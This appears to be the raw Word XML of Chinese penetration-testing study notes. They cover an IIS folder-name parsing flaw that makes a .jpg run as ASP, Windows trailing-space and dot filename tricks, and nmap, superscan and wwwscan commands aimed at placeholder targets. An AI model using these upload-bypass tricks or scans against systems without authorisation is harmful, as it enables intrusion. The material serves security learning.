      <w:r w:rsidR="00832C43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹下的</w:t>
      </w:r>
      <w:r w:rsidR="00D348EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.jpg</w:t>
      </w:r>
      <w:r w:rsidR="00251B58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00832C43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.asp</w:t>
      </w:r>
      <w:r w:rsidR="00832C43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="00A12CFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析成</w:t>
      </w:r>
      <w:r w:rsidR="00A12CFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidR="00A12CFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，</w:t>
      </w:r>
      <w:r w:rsidR="00832C43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidR="00832C43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00832C43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidR="00832C43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都能解析</w:t>
      </w:r>
      <w:r w:rsidR="00316A97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00832C43" w:rsidRDefault="00236BDF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件可以解析，</w:t>
      </w:r>
      <w:r w:rsidR="00832C43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.aspx</w:t>
      </w:r>
      <w:r w:rsidR="00832C43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹访问需要权限</w:t>
      </w:r>
      <w:r w:rsidR="00452D75">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E5018" w:rsidRDefault="002E5018">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.php</w:t>
      </w:r>
      <w:r w:rsidR="00C463D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件不能解析，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能解析，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能解析</w:t>
      </w:r>
      <w:r w:rsidR="00B2071C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成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php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能解析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E01F3" w:rsidRDefault="009E01F3" w:rsidP="009E01F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.jsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件不能解析，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.jsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.jsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能解析，</w:t>
      </w:r>
      <w:r w:rsidR="00D57DCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.jsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能解析</w:t>
      </w:r>
      <w:r w:rsidR="00B2071C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成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jsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能解析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750C15" w:rsidRDefault="00750C15" w:rsidP="00750C15">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>综上，只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能解析成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这一漏洞，其他情况下的文件只能被解析成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F01153" w:rsidRDefault="00F01153" w:rsidP="009E01F3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3065780"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="2" name="图片 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CA" w:rsidRDefault="009E0DCA" w:rsidP="009E01F3"/>
    <w:p w:rsidR="004617DC" w:rsidRDefault="004617D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2F7A" w:rsidRPr="00322F7A" w:rsidRDefault="004F1C23" w:rsidP="00C42C12">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc468296464"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>对空格和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的忽略</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00322F7A" w:rsidRDefault="00C2456D" w:rsidP="009E01F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="003F71C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>脚本语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，空格和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都是字符，是有特殊意义的，但是在</w:t>
      </w:r>
      <w:r w:rsidRPr="003F71C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下，空格和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接会被忽略。比如你新建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后重命名一下，在文件名后加空格或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，变成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.txt.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.txt (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意有个空格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，无论你加多少，回车后你会发现还是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00322F7A" w:rsidRDefault="00322F7A" w:rsidP="009E01F3"/>
    <w:p w:rsidR="00322F7A" w:rsidRDefault="00322F7A" w:rsidP="009E01F3"/>
    <w:p w:rsidR="004617DC" w:rsidRDefault="004617D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0BF4" w:rsidRPr="00116B24" w:rsidRDefault="0023663F" w:rsidP="00C3626A">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc468296465"/>
      <w:r w:rsidRPr="00116B24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00116B24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="003A07C6" w:rsidRDefault="00860BF4" w:rsidP="009E01F3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4829175" cy="4410075"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="5" name="图片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9F" w:rsidRDefault="00795F9F" w:rsidP="009E01F3"/>
    <w:p w:rsidR="00A267FF" w:rsidRDefault="00A267FF" w:rsidP="00CB44EF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004617DC" w:rsidRDefault="004617D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7FF" w:rsidRDefault="0023663F" w:rsidP="004239DF">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc468296466"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="002D5F8A" w:rsidRDefault="006924B2" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmap: network mapper</w:t>
      </w:r>
      <w:r w:rsidR="00AC4EF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（基于</w:t>
      </w:r>
      <w:r w:rsidR="00AC4EF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r w:rsidR="00AC4EF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>界面的有个</w:t>
      </w:r>
      <w:r w:rsidR="00AC4EF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Zenmap</w:t>
      </w:r>
      <w:r w:rsidR="00AC4EF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00965BA4" w:rsidRDefault="00965BA4" w:rsidP="00085548"/>
    <w:p w:rsidR="00085548" w:rsidRDefault="00085548" w:rsidP="00085548">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本命令和典型用法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085548" w:rsidRDefault="00085548" w:rsidP="00085548">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全面进攻性扫描（包括各种主机发现、端口扫描、版本扫描、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描及默认脚本扫描）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085548" w:rsidRDefault="00085548" w:rsidP="00085548">
      <w:r>
        <w:t>nmap -A -v targetip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085548" w:rsidRDefault="00085548" w:rsidP="00085548">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085548" w:rsidRDefault="00085548" w:rsidP="00085548">
      <w:r>
        <w:t>nmap -sn -v targetip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085548" w:rsidRDefault="00085548" w:rsidP="00085548">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快速端口扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085548" w:rsidRDefault="00085548" w:rsidP="00085548">
      <w:r>
        <w:t>nmap -F -v targetip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085548" w:rsidRDefault="00085548" w:rsidP="00085548">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085548" w:rsidRDefault="00085548" w:rsidP="00085548">
      <w:r>
        <w:t xml:space="preserve">nmap -sV -v targetip </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085548" w:rsidRDefault="00085548" w:rsidP="00085548">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D5F8A" w:rsidRDefault="00085548" w:rsidP="00085548">
      <w:r>
        <w:t>nmap -O -v targetip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003206AA" w:rsidRDefault="003206AA" w:rsidP="00085548"/>
    <w:p w:rsidR="003206AA" w:rsidRPr="00085548" w:rsidRDefault="003206AA" w:rsidP="00085548"/>
    <w:p w:rsidR="006924B2" w:rsidRDefault="006924B2" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>superscan 4.1</w:t>
      </w:r>
      <w:r w:rsidR="00795FFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00795FFD" w:rsidRDefault="00E87D57" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有些人比较青睐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本如果扫描不到端口，在</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>host and service discovery</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里，把</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>udp port scan</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前面的勾去掉，然后再把</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scan type</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改成</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003206AA" w:rsidRDefault="003206AA" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="003206AA" w:rsidRDefault="003206AA" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00931695" w:rsidRDefault="006924B2" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wwwscan</w:t>
      </w:r>
      <w:r w:rsidR="008F1999">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B29CB" w:rsidRPr="00D954D0" w:rsidRDefault="002B29CB" w:rsidP="002B29CB">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330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&lt;Usage&gt;:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tooltip="Posts tagged with wwwscan" w:history="1">
        <w:r w:rsidRPr="00D954D0">
          <w:rPr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wwwscan</w:t>
        </w:r>
      </w:hyperlink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exe &lt;HostName|Ip&gt; [Options]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B29CB" w:rsidRPr="00D954D0" w:rsidRDefault="002B29CB" w:rsidP="002B29CB">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330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&lt;Options&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B29CB" w:rsidRPr="00D954D0" w:rsidRDefault="002B29CB" w:rsidP="002B29CB">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330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p port        : set http/https port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B29CB" w:rsidRPr="00D954D0" w:rsidRDefault="002B29CB" w:rsidP="002B29CB">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330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m thread      : set max thread</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B29CB" w:rsidRPr="00D954D0" w:rsidRDefault="002B29CB" w:rsidP="002B29CB">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330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t timeout     : tcp timeout in seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B29CB" w:rsidRPr="00D954D0" w:rsidRDefault="002B29CB" w:rsidP="002B29CB">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330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r rootpath    : set root path to scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B29CB" w:rsidRPr="00D954D0" w:rsidRDefault="002B29CB" w:rsidP="002B29CB">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330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ssl           : will use ssl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B29CB" w:rsidRPr="00D954D0" w:rsidRDefault="002B29CB" w:rsidP="002B29CB">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330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&lt;Example&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B29CB" w:rsidRPr="00D954D0" w:rsidRDefault="002B29CB" w:rsidP="002B29CB">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330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wwscan.exe www.target.com -p 8080 -m 10 -t 16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B29CB" w:rsidRPr="00D954D0" w:rsidRDefault="002B29CB" w:rsidP="002B29CB">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330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wwwscan.exe www.target.com -r </w:t>
      </w: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“</w:t>
      </w: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test/</w:t>
      </w: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”</w:t>
      </w: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-p 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B29CB" w:rsidRPr="00D954D0" w:rsidRDefault="002B29CB" w:rsidP="007F2951">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330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954D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wwscan.exe www.target.com -ssl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D66D62" w:rsidRDefault="00D66D62" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00D66D62" w:rsidRDefault="00D66D62" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="004774A3" w:rsidRDefault="007322CC" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pangolin:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007322CC" w:rsidRDefault="007322CC" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="001D3FA7" w:rsidRDefault="001D3FA7" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00254CD2" w:rsidRPr="004C7BDE" w:rsidRDefault="001D3FA7" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004617DC" w:rsidRDefault="004617D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6D90" w:rsidRDefault="0023663F" w:rsidP="004239DF">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc468296467"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>黑客</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00714426" w:rsidRDefault="00714426" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本语法：</w:t>
      </w:r>
    </w:p>
